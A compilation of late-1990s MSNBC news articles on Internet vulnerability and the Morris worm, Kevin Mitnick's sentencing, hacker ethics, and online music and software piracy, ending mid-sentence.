By Mike Brunker
MSNBC





July 23 — Despite major security advances in the
10 years since a Cornell student unleashed a
computer program that crippled the Internet, the
vast but vulnerable network still could be taken
down by a single hacker bent on bagging the
biggest trophy of all, security and law
enforcement experts believe.

"GIVEN THE VULNERABILITIES that we
know about … and the kinds of tools that we’ve seen in the
intruder community, it certainly is possible to bring the entire
Internet down for a short period of time,” said Tom
Longstaff, research and development manager at the
Computer Emergency Response Team [CERT] at Carnegie
Mellon University. “Now keeping it down for a long period
of time is a much more difficult task.”
The impact of even a short shutdown is hard to gauge,
but experts say that the increasing reliance on the Internet
by businesses big and small means there would be
significant economic disruption. Michael Higgins, vice
president for Global Integrity Corp., a security firm that
does considerable work in the banking industry, estimates
that a “major shutdown” of eight hours or more could cost
"billions of dollars" in lost economic opportunity.
While not discounting the threat to the Net from either
a destructive hacker or a hostile foreign power, law
enforcement and the computer security industry are focused
on keeping intruders out of end-users’ systems — a logical
priority given the increasing numbers of computer and
network break-ins they are seeing.

QUESTION OF ‘MOTIVATION’
“There’s always a requirement of motivation for you to
try to determine how likely something is,” said Michael
Vatis, an FBI agent who is heading up the Justice
Department’s newly formed National Infrastructure
Protection Center [NIPC]. “And right now, there is a lot
more motivation for people to use the Internet as a vehicle
to go after particular targets … rather than [launch] an
amorphous attack on the Internet itself.”
But Longstaff says CERT, which serves as a
clearinghouse for hacking reports and distributes security
fixes as they become available, is seeing a corresponding
increase in the number of attacks on the Internet itself.
"We've seen a disturbing trend that shows more
and more attacks aimed at the infrastructure of the Internet
itself … at routers that route traffic around the Internet and
… the name servers that make the Internet operate
correctly by resolving how to send packets from one place
to another and how to name them,” he said.
The uneasiness of Longstaff and other security experts
is heightened by the nagging thought that history might
repeat itself.
The seemingly farfetched idea of a lone Lilliputian
bringing the global Gulliver to its knees became a reality
Nov. 2, 1988, when Robert T. Morris, a Cornell University
computer student, unleashed the “worm” that bears his
name.
The worm — a computer program designed to
penetrate UNIX-based computers and then replicate itself
on computers connected to the host — spread like wildfire
through the Internet, which was less than 1 percent of its
current size. Within hours it had infested at least 6,000
systems and crashed the network.


Time line: hacking and the Internet



“What brought the Internet down wasn’t that the worm
did any specific damage to the infrastructure,” said CERT’s
Longstaff. “It simply took so much of the resources from the
computers that it broke into and from the networks as it
was trying to find new computers. … The Internet
effectively shut down because of overuse, because there
just wasn’t enough capacity to run the worm and anything
else too.”

FALLOUT FROM THE ‘WORM’
Though Morris insisted he didn’t mean to crash the
network, his worm turned assumptions about Net stability
upside down, giving birth to the CERT at Carnegie Mellon
University in Pittsburgh and generally jump-starting the
entire field of computer security.
The intervening years have seen countless
improvements in computer and network security —
including a “patch” to fix the UNIX flaws exploited by the
Morris worm — and much better communication and faster
distribution of solutions when new problems are discovered.
But despite that progress, the infrastructure of the
Internet — the major routers that direct traffic from the
network’s high-speed trunk onto regional branches, the
Domain Naming Service [DNS] system, and even the
fiber-optic cables that carry the electronic packets around
the world — remain at risk.
“When you attack a network you can attack the
channels, but the channels are multiple in the Net,” said
N.E. Kabay, director of education at International
Computer Security Association Inc.[ICSA], a for-profit
security consortium. “But you can also attack the control
structures that determine things like addressing and how
information gets transferred through the Net. And in those
circumstances, I think you have a real problem.”
An example of that type of attack, albeit on a much
smaller scale, occurred in July 1997, when the InterNIC
domain registry operated by Network Solutions was
invaded by a business rival. Eugene Kashpureff, operator of
AlterNIC, pleaded guilty in March to designing a corrupted
version of InterNIC’s software that quickly spread around
the world to other DNS servers and prevented tens of
thousands of Internet users from being able to reach many
Web sites in many .com and .net domains. The software
also “hijacked” visitors to InterNIC’s Web site, rerouting
them to the AlterNIC home page.

DENIAL OF SERVICE ATTACK
Most experts say that some type of denial of service
attack — an electronic bombardment of key routers with
phony packets — would be the most likely way of
deliberately crashing the network.
A similar scenario in which routers operated by
telecommunications companies would be isolated from each
other was floated by members of the Boston hacking group
L0pht (pronounced “loft”), who testified in May before the
Senate Government Affairs Committee that they could pull
the plug on the worldwide network in less than 30 minutes
and keep it down for “a few days.”
Representatives of the telecommunications companies
that control the major Internet switching yards did not
respond to requests for interviews.
Marcus Ranum, CEO of Network Flight Recorder,
which develops security tools for network managers, said
that the main drawback to such an attack is that it would
quickly draw heat to the source.
"The problem is that to keep it down, you’d
have to be actively trying to keep it down, which would
increase the chance of the good guys catching you,” Ranum
said. “… It’s kind of like the business of being a sniper in a
bell tower: The more you shoot, the easier it is for other
people to find you. And you’re not going to do a lot of
damage unless you shoot a lot.”
Ranum said that a master hacker could probably create
a remote mode of attack that would disable the
Net’s key components while masking its creator’s identity.
But denial of service attacks are by no means the only
weapons at the criminal hacker’s disposal.
Many experts believe an updated version of the Morris
worm could again wreak havoc.

COULD WORM RETURN?
Chris Goggans, a former member of the notorious
hacker group Legion of Doom turned security consultant,
created ripples of concern in 1996 by telling the Electronic
Engineering Times that all a hacker would have to do is
“take parts of the existing Morris code, easily combine it
with some of the newer attack programs, and launch it
again.”
Or an attacker could employ tactics that have been
used - such as mail-bombing - on a much grander scale.
"Unsolicited commercial email [or SPAM]
could be used … to attack the net,” said Kabay of ICSA.
“…You could argue that this isn’t an attack on the Internet,
but if it was done to millions of people, the increased traffic
plus the unusability of email would certainly be viewed as an
attack on at least a component of the Internet.”
One of the hardest attacks to guard against is the
low-tech approach — known in security circles as the
“backhoe attack.”
“Just go in and cut the fiber [optic cable],” as Goggans
said in his 1996 interview. “Most of the domestic Internet
and all of Europe is connected [at an Internet exchange
point in Virginia], so you could wipe out everything for
days. If you cut several times in several different places, you
could wipe it out for weeks.”

POROUS BY NATURE
Part of the difficulty in securing the Internet’s
infrastructure and protecting it from ancillary attacks lies in
its structure, which was designed to facilitate
communication, not thwart invaders.
The Internet’s was “created to be used by a group of
trusted people,” said Robert Hundley, a Rand Corp.
researcher who in 1995 co-authored a report that labeled
the Net a sitting duck for criminal hackers — “crackers” is
the term preferred by non-destructive hackers — or hostile
governments. “It has evolved way, way beyond that.”
Still, warnings that the entire Internet could be taken
out aren’t given more credence largely for one reason,
security experts say: It’s difficult to envision why someone
would want to do it.
In the case of a single hacker, it would take a gifted, if
twisted, individual who most likely be driven by egotism and
malice.
“You’d have to have … that destructive mentality …
and this is not an unsophisticated attack,” said Higgins, the
Global Integrity Corp. “… I just don’t see that type of
threat present today, not from an individual.”
"I think the only case where it would be likely
to happen is if you had somebody who wanted to move
themselves into the ranks of the elite superhackers and was
trying to show off,” said Ranum, adding that a hacker who
nailed the Net would quickly become a pariah among his
peers.
“Somebody would do that and it would happen for a
little while and then get fixed. And then we’d hunt that guy
down and kill him,” he said with no hint that he might be
joking.
Some experts say a more likely scenario would be one
in which a terrorist group or hostile foreign power would
bring down the Internet as part of a larger effort to sow
confusion and fear in technologically advanced nations.
“Right now, what we can say publicly is that we do
have information that several countries are developing the
policy, the doctrine and the technical capability to carry out
that sort of attack as one component of a military strategic
plan,” said Vatis, head of the Justice Department’s NIPC,
the infrastructure protection center. “And we have to be in
position to defend against it and also to get early warning of
it.”

‘INFOWAR’ FEARS
The NIPC is the biggest single indication that the U.S.
government is serious about coming to grips with the threat
of cyberterrorism.
In fiscal 1999, the office will have 125 employees at its
headquarters in Washington, D.C., agents in each of the
FBI’s 56 field offices and eight regional computer squads
with “robust capabilities equipment” that will allow them to
conduct field investigations, Vatis said.
But while the threat of Internet terror has gotten
attention on Capitol Hill in recent months, some in the
private security industry believe the danger is being
overblown.
“The [government] has a vested interest in expanding
its domain into cyberspace,” said Ranum. “I don’t really see
any threat there. It’s not that it’s impractical, but the U.S.
certainly could run without the Internet. It’s not as if the
country would grind to a halt. It’s not as if the country
would be unable to fight a war if the Internet were down. ..
The whole scenario is very attractive in a kind of Tom
Clancyesque way, but I really think it’s pretty silly.”
Vatis calls such criticism “baseless.”
"The idea that this is all being invented or
exaggerated by the government is belied by the record that
exists out there, he said, adding that the FBI currently has a
case load of nearly 500 hacking cases, an increase of 130
percent over the past two years.

Whether or not an attacker
actually brings down the Internet,
experts agree, the global giant will
remain at risk for some time to come
because research has been
concentrated on issues deemed more
pressing.
“We’re doing more and more on
the Internet, but if you look at the
security issues… we are really targeting the realm of
confidentiality and integrity of [financial] transactions …
[not] the availability issue,” said Higgins of Global Integrity.
“That is our most vulnerable point, and it will continue [to
be] for the foreseeable future.”

-=-


Mitnick to serve 5 more months, repay $4,125 Hacker barred from
using high-tech gear for three years
By Mike Brunker
MSNBC





Aug. 9 — Nearly 4 1/2 years after he was taken
into custody, notorious hacker Kevin Mitnick on
Monday was sentenced Monday to 46 months in
federal prison and ordered to pay $4,125 in
restitution. With credit for time served, the
conqueror of computer systems at several
high-tech companies could be released in
January.

U.S. DISTRICT Judge Mariana Pfaelzer sentenced
Mitnick, 35, before a packed courtroom that included his
father, Alan Mitnick, and dozens of his supporters, many of
whom believe that he is being severely punished by the
government to set an example to other would-be hackers.
Pfaelzer, who said it would be “impossible” for
probation officials to monitor Mitnick once he is released
from custody, nonetheless banned him from using
computers, cellular telephones, televisions or any equipment
that can be used for Internet access for three years.

RESTITUTION CALLED ‘TOKEN’
She called the $4,125 in restitution a “token” amount
given the damage she said he inflicted on companies whose
computers he infiltrated, including Motorola and Sun
Microsystems Inc. She said she settled on the relatively
small amount because she considered it unlikely he would
be able to earn more than minimum wage given the
prohibition on computer use.


“I want to make a restitution order that is much, much
larger,” she said in rejecting the prosecution’s request that
he be ordered to pay $1.5 million to his victims. “But I can’t
be sure he can pay it, and any non-payment is going to be a
violation of the terms of his release.”
Prosecutors initially accused Mitnick in a 25-count
indictment of causing an astonishing $80 million in damage
by breaking into the computer networks of Motorola, Sun
Microsystems, NEC and Novell, among others, preceding
his arrest. The charges carried a maximum penalty of nearly
200 years in prison, though sentencing guidelines would
have precluded a sentence anywhere near that harsh.
But under a plea bargain announced in March, Mitnick
stipulated that he caused $5 million to $10 million in damage
while invading computers.
He has been in jail since February 1995, first serving
time for breaking probation on an earlier conviction and
fleeing authorities. Authorities repeatedly argued against
granting bail to Mitnick, charging that his technological
wizardry posed a serious threat to the public.

CAPTURED IN NORTH CAROLINA
Mitnick, who spent 2 1/2 years on the run before his
1994 capture by federal agents in North Carolina, arguably
is the world’s most notorious hacker, the subject of
numerous books and a soon-to-be-released film.


His long wait in jail also has made him a hero and a
martyr to other hackers and “crackers,” the former’s
preferred term for those who aim to profit by breaking into
computers. They say his lengthy wait without a trial was an
attempt to intimidate other would-be hackers.
“When you realize that you have to wait 3 1/2 years for
a trial, even if you’re innocent you’re going to plead guilty,”
Eric Corley (a k a Emmanuel Goldstein), editor of 2600 —
the Hacker’s Quarterly, told MSNBC last year.
But government attorneys call the case as a
by-the-book prosecution of a repeat offender who just
happens to be a notorious hacker and deny that he is being
singled out.


"He is being prosecuted because he violated the
law,” said Chris Painter, an assistant U.S. attorney. “… He
violated a lot of laws.
“Is it true that computer hackers should think twice
before violating the law? Yes, it is our position they always
should do that. … But Kevin Mitnick is not being singled
out.”

WON RIGHT TO USE LAPTOP
Because most big hacking cases have been settled
prior to trial, Mitnick’s case had been expected to set
numerous legal precedents. But despite repeated avowals
through his attorney to take his case to trial, Mitnick agreed
to the plea bargain nearly four years after he was jailed.
Still, Mitnick blazed a small legal trail by winning the
right to use a laptop computer at the jail to review the
mountain of electroni

  
c evidence the government has
compiled against him — enough data to fill a library if it
were printed out, Randolph said.
During numerous hearings on the matter, prosecutors
urged Judge Pfaelzer to deny Mitnick access to a computer
at the jail — even one without a modem — arguing that he
could somehow use it to engineer an escape or otherwise
compromise security at the jail. The judge sided with the
prosecution during a series of hearings on the matter but
reversed course in March 1998 and allowed Mitnick to
review evidence on a laptop in the jail’s attorney-client
conference room. The two sides then spent months
wrangling over procedures for the review before Mitnick
was allowed to begin poring over the computer files in
January.
That was virtually Mitnick’s lone success in pretrial
legal skirmishes.
Motions to set bail for him were rejected by the judge,
who agreed with prosecutors that he was a flight risk and
posed a danger to the public. The denial of bail was upheld
by the 9th Circuit Court of Appeals in San Francisco.
Nor did the defense have any success in persuading
Pfaelzer to allow the defendant access to encrypted files or
“hacking tools” that prosecutors say were in his possession
when he was arrested.

A CAUSE CELEBRE

The perception that Mitnick is being harshly treated by
the government has made his case a cause celebre among
hackers and Internet libertarians.
There are numerous Web sites devoted to his legal
battle and scores of Web sites have been altered by
sympathetic attackers to include calls for his freedom,
notably the UNICEF and Yahoo! home pages.

Mitnick and his capture have been documented in several books — most
notably “Takedown” by New York Times reporter John Markoff and
Tsutomu Shimomura, the computer security expert who helped the
government track Mitnick down, and “The Fugitive Game — Online with
Kevin Mitnick,” by Jonathan Littman.

Adding to his notoriety is an upcoming feature film of
“Takedown,” which is expected to open later this year. The
film, which is being produced by a division of Disney’s
Miramax Films, will star Skeet Ulrich as Mitnick.
An early version of the script drew howls of outrage
from Mitnick supporters because of numerous liberties
taken by the writers in the interest of creating dramatic
tension.
Among the untruths: During the pursuit, Mitnick clubs
Shimomura with a garbage can lid, gashing his head (they
never met until after Mitnick’s arrest); he obtains free phone
calls by whistling into the phone a la legendary phone
phreaker Captain Crunch; he rigs a radio call-in contest to
win a TV, a stunt performed in real life by fellow hacker
Kevin Poulsen; near the end of the movie he vows to
escape during a jail conversation with Shimomura, saying,
“I’ll be seeing you. All I need is a dime and a phone.
Sometimes, if I’m lucky, I don’t even need the dime.”

The Associated Press contributed to this report.

-=-


Hackers: Knights errant? or knaves?

By Mike Brunker
MSNBC

July 23 — Emmanuel Goldstein, editor of 2600 —
The Hackers’ Quarterly, says hacking is about
“learning, sharing information, being the first
person to discover something.” To Marcus
Ranum, CEO of a network security firm,
breaking into someone else’s computer means
“sheer mental and emotional anguish” for the
victim. Strangely, depending on the
circumstances and the individuals involved, they
are both right.

HACKERS ARE the knights-errant of the Internet
Underground, wandering the byways of cyberspace in
search of adventure, mischief and — in some cases —
somebody else’s treasure. But their reasons for embarking
on an avocation that carries plenty of baggage with it are as
diverse as the Internet itself.
What is clear is that there are many more hackers than
there used to be. The Computer Security Institute, in a
recent survey of computer crime, found a 16 percent
increase in security breaches of corporate computer
systems over the previous year, more than half of which
were accomplished via the Internet. The FBI now has
roughly 500 computer crime investigations open at any
given time. And the experts agree, these statistics reflect
only the thinnest slice of the hacking phenomena.

INSIDERS MOST LIKELY CULPRITS
Most security breaches are still committed by insiders
— dishonest or disgruntled employees in most cases — but
outside intrusion is on the rise.
The statistics are capable of striking fear into the hearts
of those intent on building the Internet into a mighty machine
of commerce, but they hold promise for at least one sector:
Dataquest estimates the market for computer security will
grow into a $13 billion business by 2002, up from $6.3
billion in 1997.
The computer- and network-security experts find
themselves confronted by a highly resourceful enemy that
can assume many guises.


Goldstein, whose real name is Eric Corley, is a leading
spokesman for the “Jacques Cousteau School of Hacking,”
representing those hackers who revel in the cerebral,
exploratory aspects of the craft.
"What hacking is about is learning, sharing
information, being the first person to discover something,
being the first person to try defeating a system in a different
way,” he said. “The thing with hackers is we don’t keep
secrets, we share information.

THE CASE FOR HACKING
“If hacking did not exist, people would not
discover the mistakes, the basic ways that a system can be
compromised until it was too late, until someone with an
agenda had actually gotten in there and done something bad
for a purpose. Hackers get in there and they tell everybody
what they did.”
These hackers believe authorities and the media have
unfairly stigmatized them by failing to make the distinction
between hackers, who are essentially trespassers, and
computer criminals. The latter, known as “crackers,” to the
nondestructive hackers, break into systems to steal or
wreak havoc.
“I believe the crime of simply hacking a system should
be illegal in the same way it would not be legal to wander
through my house. It’s kind of the same issue,” said a
hacker known as Lucifer. “I do think the punishment
typically outweighs the crime. Typically, a
breaking-and-entering conviction [in the real world] will get
you a suspended sentence, while burglary is treated much
more seriously. I think the same should apply.”
Unfortunately, problems can arise when hackers’
explorations have unintended consequences, as was the
case last year when a juvenile hacker who broke into a Bell
Atlantic network inadvertently shut down communications
between the control tower and aircraft at the Worcester,
Mass., airport. Fortunately there were no crashes.

SUFFERING IGNORED, CRITICS SAY
The high-minded hacker ethic also ignores the
considerable human suffering that even the most benign
break-in can create, says Ranum, CEO of Network Flight
Recorder, which creates security tools for network
managers.
“This isn't fun stuff, he said. “There is real
damage. … You get some system or network manager who
works up on Wall Street and his systems have been broken
into … by one of these barely post-pubescent hackers and
they’re scared for their jobs, they’re afraid they’re going to
lose their careers, they’re worried about their mortgages.
I’ve seen grown men reduced to tears by this kind of thing.
It’s just not right.”

The natural tension that exists
between the hackers and those
charged with either preventing them
from breaking in or catching them once
they do is understandable. But it tends
to obscure the fact that the hackers
who are most feared are not the ones
who call attention to their exploits or
bait the security experts.
“I worry about the ones that you never see and
you never hear, because they’re not driven by ego,” said
Michael Higgins, vice president for operations and
technology with Global Integrity Corp., an international
security firm. “ … In my line of business. they’re usually
driven by the almighty dollar, which means that they’re
somehow causing fraud or they’re causing extortion events
and they’re making money.”

-=-

Online thieves collide with the law
A look at how copyright theft is being handled in the courts
By Bobbi Nodell
MSNBC

July 23 — While the Internet yearns to be a
free-wheeling exchange of information,
corporate America is beginning to chase down
those who circulate copyrighted material on the
Internet without paying dues. Companies have
hired digital detectives to locate sites violating
the U.S. Copyright Act, and then, using threats
or legal action, have forced the operators to
remove the material. Here’s a look at the efforts
— in the boardrooms and in the courtrooms —
to crack down at online theft.

WITH AN ESTIMATED 300 million web sites,
policing illegal activity is a never-ending chore.
Christopher Young, president and chief operating
officer of Cyveillance based in Alexandria, Va., says
that his company has uncovered 100,000 violations since
it was formed 1 1/2 years ago to search for illegal
sites. Young said the violations his company has
uncovered run the pilfering gamut — including theft of
statistics from the National Basketball Association
site, trading nude photos of Pamela Anderson,
downloading copies of Windows 98, stealing Madonna’s
new album before it was released, or taking a Nike logo
and illegally representing the web site as that of a
Nike dealer. ”[And] don’t even get me started on rumors
and opinionated information on companies” posted on
bulletin boards and in chat rooms, he said, saying that
such false information meets the legal definition of
slander. Michael Overly of the Los Angeles law firm of
Foley & Lardner, said while there is no specific
statutory law directed at copyrighted material online,
courts are addressing the issue in piecemeal fashion in
a number of cases. “In some areas of the country there
is no direction, while in others there’s been conflicts
in the law,” he said. One of the main questions at
issue is how to clarify copyright protections for the
online world. For instance, should Internet service
providers [ISPs] be held liable for something a
subscriber posts on-line? Under the U.S. Copyright Act,
an ISP technically could be held liable, though a
number of courts have resisted that interpretation,
Overly said. In 1996, for example, the Church of
Scientology sued Netcom after the ISP refused to remove
church writings posted on its computer network by a
former Scientologist minister. The church argued that
the doctrines were copyrighted material and Netcom
should be held responsible for copyright infringement.
However, a federal judge in California ruled that
Netcom was not liable, even though it was partly
responsible for the material being illegally published
by refusing to remove it after receiving notification
from the church.

FEARS OF OVERREACTION
While there is general agreement that online theft is a
problem, some think companies are destroying a good
thing by becoming overly aggressive in their attempts
to root it out. “There’s a Salem witchhunt going on out
there saying that this is something worse than it
really is,” said Jon Noring, the founder of OmniMedia
Digital Publishing, an online book publisher and
himself a victim of cyber theft. “It could lead to
Congress passing much more Draconian laws which could
have a serious effect on free passage of information.”
He said he is especially concerned that the Software
Publishers Association is trying to create a “police
state” by overzealously guarding copyrighted software.
While a far cry from totalitarianism, there have been a
number of attempts on the national front to crack down
on online theft: After a MIT student created a site
encouraging web surfers to steal software and computer
games, lawmakers scurried to toughen up the copyright
act to create certain criminal penalties for copyright
infringement — even if the offender does not benefit
financially, said Dallas attorney Craig Weinlein. The
result was the “No Electronic Theft Act” signed into
law by President Bill Clinton on Dec. 16, 1997. The
U.S. Copyright Act of 1976 was amended in 1995 to
protect the transmission of a digital performance,
therefore if someone plays music over the Internet
without proper authorization, they could run afoul of
this act. Now many companies are rallying behind a new
bill - the Digital Millenium Copyright Act (HR 2881) -
that addresses several new areas of copyright theft.
Most important, it would exempt online service
providers from copyright liability for simply
transferring information on the Internet. It also would
make it illegal to develop software that would disable
encryption included on software and CD-ROMs intended to
prevent people from copying the work. The bill passed
the Senate but was blocked in the House by the library
coalition and is still waiting to be voted on.
Controversial legislation also is pending to protect
information databases from being appropriated.
Currently, if someone compiles baseball statistics, for
instance, that information is not protected. The
Collections of Information Anti-Piracy Act, sponsored
by Rep. Howard Coble, R-N.C., was passed by the House,
but few think it will pass the Senate, where it has
encountered opposition from researchers and others who
worry that once this material is copyrighted, it won’t
be available to the public. Other areas still need
hashing out, including how efforts to prevent copyright
infringement might themselves infringe on privacy.

For example, many companies are
turning to digital “watermarks” —
an electronic code — to track
copies of their software, sound
recordings, books or photos. But
some Internet libertarians worry
that these companies also will
use the technology to track and
assemble information on the
customers who purchased the
material. Also under debate is
the online definition of “fair
use” under Section 107 of the
U.S. Copyright Act. Saying the
copyrighted material is not for
profit, is no longer a shield, as
many schools have been prosecuted
for copyright infringement, point
out lawyers. The key, for
lawmaker, is knowing where to
draw the line. “We don’t want to
legislate the Internet out of
existence by making laws too
strict,” said Overly. “In the
United States, we have a tendency
to rush in and legislate before
we know what’s going on with new
technology.”

MSNBC’s Molly Masland contributed to this story.

-=-

Sound Waves: A digital battleground how the music industry
is dealing with net pirates.

By Bobbi Nodell
MSNBC

July 23 — Sound waves have become one of the
hottest battlegrounds on the Internet these days.
With the advent of new compression technology,
people can now download sound files in
moments, store them on a hard drive or record
them on a compact disc using a CD recorder,
which can be purchased for $300.

THOUSANDS OF SITES offer near CD-quality
sound recordings, so it’s possible for some music
enthusiasts to bypass the music store altogether. For music
pirates, the technology is almost a license to steal.
Three months before its official release, Pearl Jam’s
entire “Yield” album was posted online. Madonna’s new
album “Ray of Light” made it to the Web months before its
release. So did Alanis Morrissette’s new song, “Uninvited,”
part of the soundtrack for the film “City of Angels.”
The Internet is full of “tribute sites” that offer vast
electronic libraries dedicated to specific artists and one
unofficial study found more than 1,800 digital jukeboxes.
Some digital pirates charge consumers to download the
music but others offer it for free and are brazen about what
they are doing.
One music archive site said, “Leech what you’d like. I
don’t care. Just be nice and upload something for others.”
Another begged Web surfers to “take but don’t tell.”

RECORDING INDUSTRY STRIKES BACK
Fearful of the future, the music industry is responding
with a vengeance. The Recording Industry Association
has already issued 750 warning letters to offending web
sites and launched five major lawsuits charging federal
copyright infringement — three were settled in January and
two of the cases are still pending, said Steven D’Onofrio,
executive vice president of RIAA. The association
represents the companies and people who work in the $12
billion recording industry.
“This is a growing problem and we are greatly
concerned about it,” he said.
Reproducing and distributing copyrighted sound
recordings without authorization is a violation of federal
copyright laws. While a portion of a music clip can be used
under the “fair use” terms, it’s not OK to use copyrighted
material without the proper permission — no matter what
kind of disclaimer is put on the site.

D’Onofrio said he’s not sure how much of the $300
million lost every year to music pirates is from online theft
but it’s enough for his group to take notice. He said the
music industry would rather avoid lawsuits and focus on
education. It has teamed up with several universities and
launched a “Soundbyting campaign” to educate students not
to download digital recordings from illegal music archive
sites. Many of these sites are operated by students on
university servers using a technology called MP3, which
allows computer users to shrink audio files from compact
discs without losing any noticeable sound quality. The
CD-quality files can be played on a computer with one of
the many free MP3 players found on the Internet.
A trip around the Internet using the search term “MP3”
shows how large the problem is. On a recent Alta Vista
search, MP3 had more than 325,000 hits, many of them
offering bootleg versions of songs.
The association ferrets out these illegal sites with a staff
of digital detectives as well as an automated Web crawler.
While thousands of these sites still exist, the recording
industry is gaining some ground. D’Onofrio said every site it
has contacted has pulled the offending material or closed its
site. And the courts have come down on the side of the
recording industry in three cases so far, awarding $100,000
in damages for each infringed sound recording identified in
the complaint — representing damage awards totaling more
than $1 million against each defendant. The recording
industry, however, deferred collecting the damages as long
as the sites refrain from posting copyrighted material.
To help the industry’s cause, the No Electronic Theft
Act was passed in November 1997. Among other things,
the act criminalizes copyright infringement, even if there is no
financial gain.
But it’s not just the recording industry that’s fighting
back.

OTHERS ON THE PROWL
The American Society of Composers Artists and
Publishers, which represents 75,000 songwriters and
publishers, is going after anyone streaming music on the
Internet without a license. Marc Morgenstern, senior vice
president of new media for the society, said that unlike
artists, who make most of their money from record sales,
songwriters profit from the performing rights. His group also
has a team of people who surf the Web and find offending
sites. Most of the time, he said, they contact the site and get
them to take the material down but he said the group
brought a lawsuit once and settled for a $250 license fee.
The license fee is based on the site’s revenue.
The National Music Publishers Association , which
represents more than 17,000 music publishers, is issuing its
own slew of cease-and-desist orders. It is also interested in
the lyrics and musical notations from copyrighted material.
One of its most public efforts has been its battle against
the Online Guitar Archive, OLGA, which has a library of
some 33,000 guitar tablatures. The site has a search engine
that allowed users to search the databases for a popular
song and see how to play it using tabs, which teach
guitarists how to play the song by showing people where the
put their fingers. While printed music is put out by the music
publishers, the tabs on OLGA are written by other guitar
players.
OLGA, a site started in 1992, was an outgrowth of
Usenet groups and has a loyal following around the world,
getting some 50,000 hits a day when its archive was up. It
shut down in early June and won’t reappear until it reaches
an agreement with the Harry Fox Agency, said John
Nielands, public relations director for the site. He said the
site has received over 30,000 letters from users asking the
agency to back down and he said over 35 volunteer
attorneys have offered to prepare a legal brief arguing that
the tabs meet the definition of fair use. Meanwhile, 15-20
mirror sites around the world have popped up in defiance of
the order.



The OLGA shutdown follows a similar dispute between
Warner Bros. and another tablature site, Guitartabs.com,
that led the site to remove its tabs in May.
As for printed sheet music — a $600 million business
worldwide — some companies are turning to digital
watermarks that embed a code in their material that makes
it easier to track down for infringement.

Seattle-based Sunhawk Corp., a
digital music publisher and online sheet
music store that has signed contracts
with Warner Bros., offers several
thousand song titles with digital
watermarks that tell them who
purchased the material. Downloadable
audio samples are also encrypted so
only one user can hear the music
played without purchasing it. “I think this is the future of
how printed music is going to go,” said the company’s chief
executive officer Brent Mills. His view is that the OLGA site
is illegal but he said its popularity points out how huge the
market is for online sheet music.

-=-

Software piracy a booming Net trade
‘You can go anywhere ... steal anything you want,’ official says

By Molly Masland
MSNBC

July 23 — Their names are often obscure —
Zorgok’s Lair, the Legion of Krypt, XorcistX —
and transient, changing without warning. They
don’t do public relations, many don’t make
money and their ‘proprietors’ are often still in
their teens. The business of online software
piracy has increased dramatically in recent
years, vexing legitimate software makers.

“WHAT DO YOU want to pirate today?” reads a
banner at one of the many sites that can be found by nearly
any user doing a basic Internet search for the word ‘warez,’
the online term for unlicensed programs.
“The Internet lends itself to piracy,” said Peter Beruk,
director of anti-piracy for the Software Publishers
Association, a trade group based in Washington, D.C.
“You can go anywhere you want, buy anything you want,
and steal anything you want.”
The Internet, too, has fostered the demand for cheap
software and the development of high-speed modems
capable of quickly downloading large programs.
Written in a variety of languages, including Russian,
Vietnamese and German, some sites provide software for
free or trade while others charge a fee.

INDUSTRY LOSSES
According to the software industry, piracy is not only a
violation of copyright laws but a crime that costs
manufacturers millions annually in lost revenue.
A study published in June by the Business Software
Alliance, which represents software vendors, and the
Software Publishers Association, said the industry loses
more than $11.4 billion a year worldwide to piracy.
Although the group estimates that over 25 percent of
software applications in the U.S. are pirated, the problem is
far worse in developing areas of the world such as
Southeast Asia and Eastern Europe, where piracy rates are
said to hover as high as 95 percent or more of all
applications in use.
“You’ll see just about every program that’s popular
being offered and downloaded on the Internet,” said Bob
Kruger, vice president of enforcement for the Business
Software Alliance. “These people don’t appreciate the fact
that what they’re doing inflicts injury on people. They think
it’s a victimless crime, but it’s not.”

DEBATE OVER COSTS
While software piracy undoubtedly costs manufacturers
revenue, some argue the figures are overblown. They claim
the statistics are inaccurate because they discount the fact
that many people who use pirated software would not have
purchased a licensed copy in the first place.
“The numbers are very misleading,” said Jon Noring,
founder of Omnimedia Digital Publishing, an online
distributor of electronic books. “They’re right if you simply
multiply the number of pirated copies by their selling cost.
But the issue is really that in a piracy free world, what
percentage of those copies would actually have been
bought?”
Two years ago, Noring himself was the target of a
software pirate who cracked his security code for the Kama
Sutra, one of the more popular books offered by Noring’s
company, and made it available over the Internet for free.
Omnimedia charges a fee to download the complete copy
of a book. At first, Noring was concerned the breach would
impact sales; two years later, he said he’s seen “absolutely
no net effect whatsoever.”
Noring argues that some users, including many in
developing countries, cannot afford to buy licensed software
and would not have purchased it if they didn’t have access
to a pirated copy.
As one user from Singapore wrote in an online
newsgroup, “Many Singaporeans support software piracy.
Singaporeans know that it is morally wrong…so there’s no
need to educate us. It’s those software companies that need
to be educated. If they lowered their software prices,
Singaporeans would be willing to buy the originals. Anything
more than $30 for the original is daylight robbery for us.”
For many users, especially teens and college students,
collecting pirated software has become a compulsive
hobby. While no software pirates contacted by MSNBC
would comment on the subject, Noring says many do it for
fun. “They get a rush and an excitement out of it,” he said.
“Their disks are piled with the stuff but it’s not on their
computers. They just have it. It’s like collecting the whole
set or something.”

COPYRIGHT VIOLATION
Regardless of the debate over costs or the reasons why
people use unlicensed programs, software piracy remains a
crime under federal copyright laws. The U.S. Copyright Act
gives the owner of a copyright the exclusive right to control
the reproduction or distribution of a particular work.
Anyone who distributes the work without permission of the
owner violates the law and is subject to damage awards up
to $100,000 per copyrighted work, or actual damages
suffered by the owner if they can be proven.
“If somebody has one piece of software posted on a
Web site, that may not warrant a civil suit or referral for
criminal prosecution,” said Kruger. “But if you have
somebody running a mail order business and advertising on
the Internet, we want to have that site shut down and the
operators prosecuted.”
In order to counter the efforts of online pirates,
investigators try to identify a particular site’s Internet service
provider and have the site disconnected. Often the sites
provide their ISPs with false names and addresses, making
it difficult, if not impossible, to track them down.

HARM TO USERS?
Although supporters of piracy may argue it’s harmless
and actually does people a favor, others point out that
piracy hurts not just manufacturers but also users who
download it.
“There are a number of benefits you get when you
purchase legal software,” said Kruger. “You get guarantees
that it’s virus free and will operate as it’s supposed to. You
also get technical support, a manual and access to
upgrades. If you download it from the Internet, you get
none of these things.”
In addition, pirates need a place to store their ‘warez’
and often surreptitiously hijack third party servers to use as
storage sites.
This problem is especially acute at universities.
According to Beruk, software pirates are most commonly
high school or college students with access to servers where
they can store large quantities of programs. Campus servers
often become the unwitting hosts for bundles of illegal
software.
One of the more dramatic cases Beruk has been
involved in was at Andrews University, a small liberal arts
college in Michigan. Campus tech support noticed that one
of the university’s main servers was running at close to 90
percent capacity.

After removing two ‘warez’ sites, the server’s capacity was
